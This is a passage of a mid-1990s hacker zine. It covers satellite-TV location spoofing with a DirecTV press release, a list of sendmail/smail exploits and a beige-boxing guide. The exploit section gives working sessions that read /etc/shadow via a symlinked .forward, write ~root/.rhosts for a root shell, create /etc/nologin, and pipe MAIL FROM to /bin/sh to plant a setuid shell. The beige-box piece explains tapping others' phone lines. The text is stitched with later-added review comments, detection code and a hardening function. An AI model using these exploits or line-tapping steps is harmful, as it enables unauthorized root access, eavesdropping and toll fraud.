address but some individuals may establish small networks.
We have no knowledge of the laws regarding the reception
of DirecTV programming in the various countries where the
signal is available. Since the system passes voice as well
as data calls it could conceivably be used to make use of
800 numbers in the U.S. or possibly to reduce long distance
charges. It could also be used by networks of cautious
individuals to manually order PPV events. The common
phone number could easily be that of a business with
several employees who have DSS systems.

The system could also be used by U.S. residents or
commercial establishments to obtain locally blacked out
sports events by misleading DirecTV about the true location
of the system. Using the DBS Dialer in the U.S. is a serious
crime and subjects users to the variety of criminal and civil
actions mentioned in DirecTV's press release. The units
could also be used by individuals who obtain the deluxe
system and take advantage of the reduced subscription
rates available to additional units. We have heard that
DirecTV is now insisting that all units in a deluxe system
be connected to the same phone number.
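The ANI that the diverter substitutes is exactly what the 800-number side receives, and the article also says multi-unit systems are now expected to call in from one phone number. The screen below is an added example, not from the article and not DirecTV's own logic: it runs the three checks a billing-side analyst could make over callback records, an ANI that does not match the number on the account, one line reporting in for more receivers than a household plausibly owns (the shared-diverter and piggyback cases), and one account whose units call in from different lines. The record layout, field names, sample records and the threshold are all constructed assumptions.

```python
"""Screen DSS-style billing callbacks for diverter and dialer patterns.

Added example; not the article's material and not DirecTV's detection
logic. Assumes each monthly callback is logged as account number,
receiver serial, the telephone number on file for the account, and the
ANI delivered with the 800-number call. Records below are constructed.
"""
from collections import defaultdict

# Constructed sample. R2001-R2003 belong to different accounts but all
# report in from one U.S. line (a shared diverter); R3001 piggybacks on
# R1001's published number; account A5 is a multi-receiver system whose
# units call in from two different lines.
SAMPLE_CALLBACKS = [
    {"account": "A1", "receiver": "R1001", "billing": "7165550101", "ani": "7165550101"},
    {"account": "A2", "receiver": "R1002", "billing": "7165550102", "ani": "7165550102"},
    {"account": "A3", "receiver": "R2001", "billing": "3605550199", "ani": "3605550150"},
    {"account": "A4", "receiver": "R2002", "billing": "3605550198", "ani": "3605550150"},
    {"account": "A6", "receiver": "R2003", "billing": "3605550197", "ani": "3605550150"},
    {"account": "A7", "receiver": "R3001", "billing": "2125550133", "ani": "7165550101"},
    {"account": "A5", "receiver": "R5001", "billing": "3055550177", "ani": "3055550177"},
    {"account": "A5", "receiver": "R5002", "billing": "3055550177", "ani": "3055550190"},
]


def ani_mismatches(records):
    """Receivers whose delivered ANI is not the number on the account."""
    return sorted(r["receiver"] for r in records if r["ani"] != r["billing"])


def shared_lines(records, max_receivers=2):
    """ANIs that more receivers report from than one household plausibly owns.
    max_receivers is a constructed threshold, not a DirecTV figure."""
    by_ani = defaultdict(set)
    for r in records:
        by_ani[r["ani"]].add(r["receiver"])
    return {ani: sorted(rx) for ani, rx in by_ani.items() if len(rx) > max_receivers}


def split_accounts(records):
    """Multi-receiver accounts whose units call in from different lines
    (the 'all units on the same phone number' rule for deluxe systems)."""
    by_account = defaultdict(set)
    for r in records:
        by_account[r["account"]].add(r["ani"])
    return sorted(a for a, anis in by_account.items() if len(anis) > 1)


def flag(records, max_receivers=2):
    """Receivers worth a closer look, with the reason(s) for each."""
    reasons = defaultdict(list)
    for rx in ani_mismatches(records):
        reasons[rx].append("ani != billing number")
    for ani, rxs in shared_lines(records, max_receivers).items():
        for rx in rxs:
            reasons[rx].append("shares line %s with %d others" % (ani, len(rxs) - 1))
    bad_accounts = set(split_accounts(records))
    for r in records:
        if r["account"] in bad_accounts:
            reasons[r["receiver"]].append("account %s reports from several lines" % r["account"])
    return dict(reasons)


if __name__ == "__main__":
    for rx, why in sorted(flag(SAMPLE_CALLBACKS).items()):
        print(rx, "->", "; ".join(why))
```

A receiver that honestly calls in from its own line (R1001 above) is not flagged even though someone else piggybacks on its number, because only the line's total count, not the honest receiver's mismatch, crosses the threshold.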

Appendix

DIRECTV PREPARES LEGAL ACTION AGAINST
UNAUTHORIZED DISTRIBUTORS

Complaints Seek to Prevent Illegal Reception of DIRECTV
Service Within Canada

Los Angeles, CA. June 19, 1995 - DIRECTV, Inc., a unit of
Hughes Electronics Corporation, took action against
individuals and entities in Canada who have facilitated the
illegal reception of the DIRECTV programming service in
Canada. Cease and desist letters were issued to five potential
civil defendants, four of whom are located in Canada.
DIRECTV is also preparing to file civil claims against the
potential defendants in U.S. federal courts.

In addition, DIRECTV is deactivating the accounts of more
than 600 known "grey market" Canadian subscribers whose
accounts with DIRECTV had been activated by the defendants.
These steps by DIRECTV are part of its ongoing broader
effort to actively protect its programming rights and to secure
the signal integrity of the direct broadcast satellite (DBS)
service.

A civil complaint was delivered with the cease and desist letters
sent to David A. Diebert of Echo Communications and/or Dragon
Pacific, Vancouver, B.C.; Mike McAllister of Version II Marketing,
Waterloo, Ontario; National Computers and Supplies, also of
Waterloo, Ontario; Digital DTH Distributors, Edmonton, Alberta;
and Propack Inc., Blaine, Washington. The complaints are to be
filed shortly in U.S. District Courts in the states of
Washington and New York if the defendants do not meet the
demands contained in the letter.

The civil claims are a result of investigations by the
DIRECTV Office of Signal Integrity, which is headed by
former FBI Special Agent Larry Rissler. Rissler's
investigation revealed that the defendants, through the
distribution of equipment and attempts to manipulate the
DIRECTV customer service system, facilitated the reception
of DIRECTV programming by residents
of Canada. These actions were detected by DIRECTV
through its sophisticated security systems and procedures.

Further, the complaint alleges that the defendants assisted
individuals in obtaining programming by attempting to disguise
the location of the installed DSS(tm) system through electronic
devices and other schemes. These actions violate several U.S.
federal statutes, all of which also carry substantial criminal
penalties.

"We're committed to the identification and, where
appropriate, the prosecution of those individuals and entities
who foster the unauthorized receipt of DIRECTV
programming," said Rissler. "These actions are the first
visible results of an aggressive on-going campaign by
DIRECTV to protect its service and attack all types of
unauthorized use, including Canadian grey market activities,
as well as any residential or commercial misuse
within the United States," Rissler added.

The federal statutes cited in the complaints are the Federal
Communications Act, which prohibits the unauthorized receipt
and use of satellite communications, including commercial
television programming; the Federal Wiretap Statute, which
proscribes the use of electronic or mechanical devices for the
surreptitious reception of satellite programming; and the
Computer Fraud and Abuse Act, which addresses the
transmission of false information through sophisticated
computer systems.

According to DIRECTV, the filing of the civil complaints
would mark the first known use of the Computer Fraud
and Abuse Act to address satellite signal theft. Because of
the sophisticated nature of the computerized DIRECTV
authorization and billing system, the electronic devices used by
the defendants resulted in telephone calls from the DSS
receivers to the DIRECTV computer system which were
detected and traced to the DSS units authorized by the
potential defendants.

The civil complaints also cited Washington and New York
state causes of action, including wrongful interference with
DIRECTV programming contracts and wrongful interference
with prospective business advantage.

In all instances, DIRECTV has demanded that the defendants
immediately cease and desist the illegal action. Failure to
comply could lead to the issuance of injunctions ordering the
defendants to stop the illegal activities and the assessment of
monetary damage awards. In the case of the Federal
Communications Act, damage awards can be as much as
$110,000 for each violation.

DIRECTV and DSS are trademarks of DIRECTV Inc., a unit of
Hughes Electronics Corporation. The earnings of Hughes
Electronics Corp., a wholly owned subsidiary of General Motors
Corporation, are used to calculate the earnings per share
of General Motors Class H Common Stock (NYSE:GMH).

For more information, please contact:

DIRECTV, Inc.
Linda F. Brill
Director, Public Relations
(310) 535-5062

Resources

American Hacker BBS. Access is included with a subscription to
the hardcopy version of this newsletter. There is a free bulletin
section which is free to all. If there are any radical
developments we will post news there. We also post to
various Usenet news groups. 716.871-1915

Bomarc Services has some schematics for the RCA receiver
(see their ad in this issue). They are contract reverse engineers
and they have thousands of schematics available for all kinds
of electronic devices including most cable boxes. A catalog of
their 22 product categories costs 4 stamps. The catalog of
cable and satellite descramblers, converters etc. costs $5.
The following DSS schematics are available: Full Signal
Modulator w/RF switch (Alps 3N0110A-US). $2. DSS Tuner
Module (Sharp B5532). $4. Dual Polarity Single Channel
Ku Band LNB for DSS Systems. $1. Dual Polarity Dual
Channel DSS LNB. $2. Bomarc Services, Box 1113,
Casper, WY, 82602.

Triangle Products is the major supplier of Oak decoders. They
are available in VCII card cages for those who don't wish to
use free-standing units. New Oak encrypted channels include
Mandarin and Filipino. They also carry SureWrit 9, which is a
diagnostic test device for those studying VCII or 029 PLUS
technology. They have raw B-MAC's as well. 616.399.6390.

Hack Watch News is the foremost hacker newsletter in Europe. It
is available by electronic delivery or by mail. It is written by
John Mc Cormac who is the author of the "European
Scrambling Systems" series. They are comprehensive texts
on scrambling. John's Special Projects BBS is a repository for
Videocrypt information, smartcard programs with source code
etc. Voice 011-353-51-73640. BBS 011-353-5150143.
E-mail [email protected]. He has an article in the August issue of
Electronics Now entitled "Has DSS been Hacked?" That article is
available at http://www.iol.ie/~kooltek/hasdss. We have greater
quantity and more current information on the U.S. system
in our zine American Hacker. European Scrambling
Systems Volume 4 is 500 pages long and concentrates
on Videocrypt. It is available from Baylin
Publications, 1-800-483-2423.

New Advanced Technologies manufactures and distributes DBS
Dialer Systems. They invite inquiries for single units or networks.
Voice 514.458.3063. FAX 514.458.0798.

END PART 2 OF 2 PARTS
-------------------------------------------------------------------
File #5 of 8...

                ····────────────────────────────····
                        S e n d M a i l - B u g s

                          E x p l o i t s
                                Lists
                                v.01b
                 ····───────────────────────────····

From Hacknet, [email protected]

Introduction and Legal Ramble
-----------------------------

This is written for anyone that's interested in learning about the
many security holes that are resident in many versions of Sendmail.
I do not care if you use it to protect your system against others,
or crack other people's systems...just don't involve me in it.

I wrote it to collate all the information on sendmail into one list
for convenience and perhaps it will help some people.

I would like to thank the unknown person who started this off a long
time ago....

This paper is © 1995, however I do not object to you including
any of these in a FAQ, printed magazine, book etc... just mail me first
so I know where it's distributed *:^)

Have you spotted a mistake or anything I could add? Then just add your
own stuff and put yourself down on the credits and mail it me :)

Note: This is v.01b so there are bound to be mistakes and there is a lot
of other stuff to add as well....and expand it to include FTP daemon bugs?
I am extremely busy..and am only releasing it due to popular demand.

OH, please tell me what versions these work on!

***
Bug #1
***

Version affected: Smail 3.1.28 (3.1.28.1 in the session below), any more?

SYNOPSIS
--------

A symlinked ~/.forward plus the SMTP debug command lets a local user
read any file on the system: smail runs as root, follows the link when it
expands the user's forward file, and echoes the contents in its debug trace.

EXAMPLE OF EXPLOITATION
-----------------------

user@psyops ~> ln -s /etc/shadow .forward
user@psyops ~> ls -la .forward
lrwxrwxrwx 1 user users 11 Sep 5 12:08 .forward -> /etc/shadow

user@psyops ~> telnet localhost smtp

Trying 127.0.0.1...
Connected to localhost
Escape character is '^]'.
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:10 PDT
debug 20
250 Debugging level: 20
expn user

[lots of text]

expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile: opening forward file /home/user/.forward

[more text]

read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[....]

process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection
Connection closed by foreign host.
---------------

Contrary to popular belief, adding -smtp_debug to your smail config file
will not prevent this bug from occurring. It will just prevent exploitation
via the smtp port.

We can just do this....

----------
user@psyops ~> smail -bs -v20
expand_string($primary_name Smail$version ready for mail on $date,(null),
(null)) called
expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail on
Mon, 5 Sep 94 12:15 PDT
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15
PDT
expn user

[same text as before]

expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile: opening forward file /home/user/.forward

[more of same text]

read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[.....]

process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection

----------

To fix this, remove the -d and -v options from smail and add -smtp_debug
to your config file.


***
Bug #2
***

Smail version affected: 3.1.28 (others unknown)

SYNOPSIS
--------

Smail called with the -D flag will allow you to create and append to any
file on the system.

EXAMPLE OF EXPLOITATION
-----------------------
user@psyops ~> cat > ~/.forward

localhost user
^D
user@psyops ~> smail -bs -D ~root/.rhosts -v20
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:23 PDT
expn user
250 user
quit
221 psyops.warez.mil closing connection

user@psyops ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)

--------------

Patch this by removing the -D option from smail.

I received the following patch recently. I haven't tested it, so use
at your own risk.

*** Omain.c Wed Mar 11 12:33:18 1993
--- main.c Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
}

- /*
- * change error file to debugging file from -D option, if any
- */
-
- if (arg_debug_file) {
- new_errfile =3D fopen(arg_debug_file, "a");
- if (new_errfile =3D=3D NULL) {
- write_log(LOG_TTY, "Warning: Cannot open debug file %s: %=
s\n",
- arg_debug_file, strerrno(errno));
- arg_debug_file =3D NULL;
- } else {
- errfile =3D new_errfile;
- fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n"=
,
- program, (long)getpid());
- }
- }

/*
* read in the transport, router and director files, if needed
*
* NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
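Review bot: deleting the fopen() block at 436-458 is the right call, since at this point main.c still runs with smail's effective uid (root when setuid), so fopen(arg_debug_file, "a") creates or appends to whatever path the invoker names, which is exactly the ~root/.rhosts write shown above. One consequence to document: everything that happens between here and the new location (the comment right below says the transport, router and director files are read next) no longer goes to the -D file, because errfile is not switched until after the setuid/setgid calls.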
***************
*** 525,530 ****
--- 508,537 ----
if (prog_euid !=3D REQUIRED_EUID)
=09 queue_only =3D TRUE;
#endif

+ /*
+ * change error file to debugging file from -D option, if any
+ *
+ * JMJ: Change location of this fragment to below the setuid/se=
tgid
+ * calls to allow for use of fopen_as_user() instead of ju=
st
+ * fopen().
+ *
+ * Side effect: -D now requires full pathname to debug fil=
e
+ */
+
+ if (arg_debug_file) {
+ new_errfile =3D fopen_as_user(arg_debug_file, "a", 1, real_ui=
d,
+ prog_egid, 0600);
+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %=
s\n",
+ arg_debug_file, strerrno(errno));
+ arg_debug_file =3D NULL;
+ } else {
+ errfile =3D new_errfile;
+ fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n"=
,
+ program, (long)getpid());
+ }
+ }

/*
* error processing can be other than TERMINAL only for
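Review bot: the inserted block at 508-537 is missing the `if (new_errfile == NULL) {` line after the fopen_as_user() call, so as written the write_log() warning and `arg_debug_file = NULL;` run unconditionally, the following `} else {` has no if to pair with, and the braces do not balance; restore that line before applying. The JMJ comment claims -D now requires a full pathname, but nothing in the hunk checks `arg_debug_file[0] == '/'`, so either add that test or drop the claim. Opening with real_uid and mode 0600 does put the file under the invoker's own permissions, which is the point of the fix.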
--
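The privilege boundary the patch is reaching for, written out as an added example (my code, not smail's fopen_as_user() and not part of the zine): the -D file is opened with the invoker's real uid and gid rather than smail's effective uid, relative paths are refused (the "side effect" the patch comment mentions), symlinks are not followed, and the result must be a regular file the invoker owns. The function name and the ownership check are assumptions of this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * open_debug_file_as_user: append-open a user-supplied debug file with the
 * caller's real identity instead of the setuid program's effective one.
 * Name and policy are this example's own, not smail's.
 */
FILE *open_debug_file_as_user(const char *path)
{
    uid_t euid = geteuid(), ruid = getuid();
    gid_t egid = getegid(), rgid = getgid();
    int fd, saved_errno;
    struct stat st;

    /* only a full pathname is accepted (the patch's documented side effect) */
    if (path == NULL || path[0] != '/') {
        errno = EINVAL;
        return NULL;
    }

    /* drop to the real identity: gid first, because once the uid is
       unprivileged we can no longer change the gid */
    if (setegid(rgid) != 0 || seteuid(ruid) != 0)
        return NULL;

    /* O_NOFOLLOW: a symlink planted by the invoker must not redirect us */
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    saved_errno = errno;

    /* regain privilege (a no-op in a non-setuid process) before anything else;
       an unknown privilege state is not something to carry on in */
    if (seteuid(euid) != 0 || setegid(egid) != 0)
        abort();

    if (fd < 0) {
        errno = saved_errno;
        return NULL;
    }

    /* what we opened must be a regular file that the invoker owns */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != ruid) {
        close(fd);
        errno = EPERM;
        return NULL;
    }
    return fdopen(fd, "a");
}
```

In a non-setuid process the seteuid/setegid calls are no-ops, so the function degrades to a plain append-open with the path and symlink checks; in a setuid-root smail it is the real uid, not root, that the kernel checks against the directory and file permissions.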

***
Bug #3
***

Smail version affected: unknown

SYNOPSIS
--------

Files specified in ~/.forward can be created in any directory, regardless
of its permissions. (The file is still owned by the mailbox owner, however.)

EXAMPLE OF EXPLOITATION
-----------------------

user@psyops ~> echo "/etc/nologin" > ~/.forward
user@psyops ~> mail -r root user < /dev/null
user@psyops ~> echo "Site shutdown due to smail lameness" >! /etc/nologin
user@psyops ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.

---------

Plug up this hole by adding 'check_path' to the following part of
your /usr/lib/smail/transports file:

---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file: driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = $user,           # file is taken from address
        append_as_user,         # use user-id associated with address
        expand_user,            # expand ~ and $ within address
        check_path,             # <-- add this line
        suffix = "\n",
        mode = 0644
[....]

***
Bug #4
***

Sendmail version affected: 5.65 (the session below is against 5.65c/IDA-1.4.4)

From CSC FAQ:

A SAMPLE EXPLOITATION

A sample session follows.

---cut here
[panix!jhawk] |% telnet panix.com 25
Trying 198.7.0.2 ...
Connected to panix.com.
Escape character is '^]'.
220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13 -0500
HELO
250 Hello panix.com, why do you call yourself ?
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: jhawk@panix.com (John Hawkinson)
To: jhawk@panix.com (John Hawkinson)
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen

Hi there. Wanna play ball?



#!/bin/sh
#The above line is just in case :-)
echo This is a Serious Bug > /tmp/bug
echo id reports: >> /tmp/bug
/usr/bin/id >> /tmp/bug
echo Fixing this would be good >> /tmp/bug
cp /bin/sh /tmp/bugshell
chmod u+s /tmp/bugshell
echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug
chmod ugo+rx /tmp/bugshell
-------------------------------------------------------------------
File #6 of 8...

                        Beige Boxing

                        By: Revolution

Of course, this article is for informational purposes only, I
would never condone the use of any of this information to rip off
anybody. Credit is due to the Jolly Roger who described how to
build a beige box in his cookbook.
A beige box is just a phone with the two wires from the
headset to the jack cut and stripped, with alligator clips attached
to them. One of them is red, the ring wire, and one of them is
green, the tip wire. These are the two wires which carry a
conversation.
The moral of the story is, at many points in between your
phone and the phone of the person you are talking to, your phone
line comes above ground in various forms where it may be spliced
into rather easily with the so called beige box, allowing someone
to use your phone line for any purpose they like, including
attaching a bug to listen to your conversations.
These places are rather easy to find: find where your phone
line comes out of your house. There may be a small box attached to
the line somewhere on your house at ground level. Open the box,
and inside will be two, four or more screws. These screws will be
in groups of two, and will have wires attached to them. The trick
is to find where this wire is stripped but not directly attached to
the screw, and attach your alligator clips to them, one to each
wire. If you don't hear a dial tone, switch the alligator clips.
If there is not a box on a house near you, or that is a little
too risky for your taste, look at the bases of telephone poles
around your house. Many different items present themselves here,
all which can be opened and interfaced by your beige box.
One of these, and the most plentiful, is the green tree. It's
a small rectangular green pole that normally says "call before
digging," or something to that effect on the side of it. Two 7/16
ratchet bolts need to be turned a bit on each side of it before one
half will lift off, revealing a bunch of wires under a plastic
bag, and a paper somewhere which reveals what phone numbers this
tree connects to. The wires all connect to a gray stalk at the
bottom to screws in sets of two, which is where you can beige box
from.
Another item which is much like the above is the canisters
which appear at waist level attached to some older poles. One
screw must be undone, and then the top turns and lifts off, and can
be used like the one above.
On some poles there is a huge cabinet with a sticker which
says MIRROR IMAGE CABLE, or something else about cables. These are
sometimes padlocked, but sometimes just two handles must be undone,
one on the center and one on the top, and the cabinet opens to
reveal a ton of goodies. Facing you is a huge terminal board
connecting to hundreds of phones, which should be labeled on a
chart on the side. On both doors of the cabinet, when opened,
there are pockets which can reveal many things, including manuals
and more alligator clips. On some of them, you can push the
terminal board in and it swings down, revealing more manuals. Each
of these terminals can be beige boxed from.
Many things can be done with a beige box, including anything
you can do from your own phone, but free. If you need to ANI,
there are three digit codes for every area code that can be
obtained with a bit of social engineering, also 2002006969 has
worked for me in the past. Any and all questions, comments,
critiques go to [email protected]. Happy phreaking!
-------------------------------------------------------------------
File #7 of 8...

                "I Wanna Be a Hacker When I Grow Up"

        I wonder if anyone's actually woken up one day and said
something to that effect. Hell, there must be some reason for the
countless world-wide "hackers" to do what they do. What is it? Fame,
fortune, money? Hardly.

        First what is needed is to clarify some definitions here. A
hacker in the true original intent of the word is not the pale, weary,
acne-covered kid who lives on chips, dew, and pall malls whilst trying
to break into the Pentagon. No, that's the shit that the media feeds
everyone. That's the image of the 'nasty vile evil hacker' who must
be caught at all costs. A true hacker is really a quite benevolent
creature. One who seeks...no, seeks is too weak...one who craves
information, lives to learn more and to see more. Someone who gets by
the security of someone's system merely to prove that it can be done
is in reality doing that sys admin a favor by pointing out the holes.

        A 'cracker' on the other hand is, to be blunt, scum. A person
with skills, yes...but nothing more imaginative than what a terrorist
could think of. Unfortunately, most of the 'computer criminals' hyped
by the media are crackers that got caught doing some stupid thing.
They'll infect hard drives with virii, crash systems, crack password
files...all for the simple pleasure of doing it...nothing more.

        So ya see...that is where the difference lies. A hacker has a
PURPOSE to his work, a goal, or a good reason to do what he does.
Screwing multi-billion buck fascist corporations like Ma Bell has a
purpose, a lofty goal. :) Screwing your local wal-mart or something
just for the sake of doing it is pathetic.

        Lo and behold, hackers do have *gasp* ETHICS??? The answer
is, yes. I can't speak for all, of course. I have talked to a lot of
really great people over the past few years since I've gotten into all
this, and I've also encountered some real sleaze. But for the most
part, we are fairly ok. All in all, there are two types of people I
hate. I can't stand the newbies that jump onto the bbs's and just
straight-out ask to be given info...info that with even a little bit
of effort can be easily looked up. The first place I encountered this
underground-like stuff was at ISCA (yeayea, spare me the ISCA sucks
hard comments...I know it does these days). I just read messages for
nearly 4-6 months or so, soaking it all in, grabbing addresses, ftp
sitez, everything I could get my hands on. Then after awhile, I found
I could take part in the discussions cause I actually had a clue for a
change. And the other type of person I can't fucking stand is someone
who thinks they are some rad eleet hacker god who won't come down off
his high horse to associate with us 'neophytes.' Someone who is far
too caught up in their own persona. Hell, I give whatever info I can
(which isn't a lot, I don't think, but others for some reason think so)
to whoever wants to learn...I mean, truly learn what it's all about.
A newbie poser who thinks he can be a leech is quite sadly mistaken.

        It's not an image, it's not an elite power-trip thing. If you
want to get involved for those reasons, then take a walk. Sure,
everyone here has a little ego (and I'll be damned if mine didn't get
a little boost when I was asked to write this :) ), but don't let your
ego get the better of you.

=09I have a tendency to get long-winded, but if you read this far
then I guess it wasn't too tough, eh?

-tarc

"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty or safety." - Benjamin Franklin, 1759
---------------------------------------------------------------------
And finally, file #8 of 8...

                        T H E   E N D

        May I remind you that this may not have been the end if you had
chosen to contribute an article or two. All contributions are welcome!
Send them to [email protected]. And please, send what you think of the
zine, I'd like there to be a letters column next month. I can be reached
as Revolution on isca, shadow, brinta, thanatos, and monolith. I can also
be reached as Mike Scanlon at 1+518-279-1594, or stop by 12 Maple Avenue
Eagle Mills, NY 12180.
        And wherever you hack, may the ethic be with you......

        "'The technology has to be considered as larger than just the
inanimate pieces of hardware,' said Felsenstein. 'The technology represents
inanimate ways of thinking, objectified ways of thinking. The myth we see
in War Games and things like that is definitely the triumph of the individual
over the collective dis-spirit. [The myth is] attempting to say that the
conventional wisdom and common understandings must always be open to question.
It's not just an academic point. It's a very fundamental point of, you might
say, the survival of humanity, in a sense that you can have people [merely]
survive, but humanity is something that's a little more precious, a little
more fragile. So that to be able to defy a culture which states that 'Thou
shalt not touch this,' and to defy that with one's own creative powers
is...the essence.'
        "The essence, of course, of the Hacker Ethic."

                                The immortal Steven Levy, from the original
                                                        "HACKERS"

Editor: Mike Scanlon
HTTP site of the month: www.gsu.edu/~socrerx/catalog.html
WaReZ site of the month: 127.0.0.1
Mailing list of the month: Billwatch
Overprotective parent of the month: Senator Exon
Endangered species of the month: The great American Hacker

Access to computers - and anything which might teach you something about
the way the world works - should be unlimited and total. Always yield to
the Hands-on Imperative!

Mistrust authority - promote decentralization.

Hackers should be judged by their hacking, not bogus criteria such as
degrees, age, race, or position.

You can create art and beauty on a computer.

Computers can change your life for the better.

                All Information should be free!
 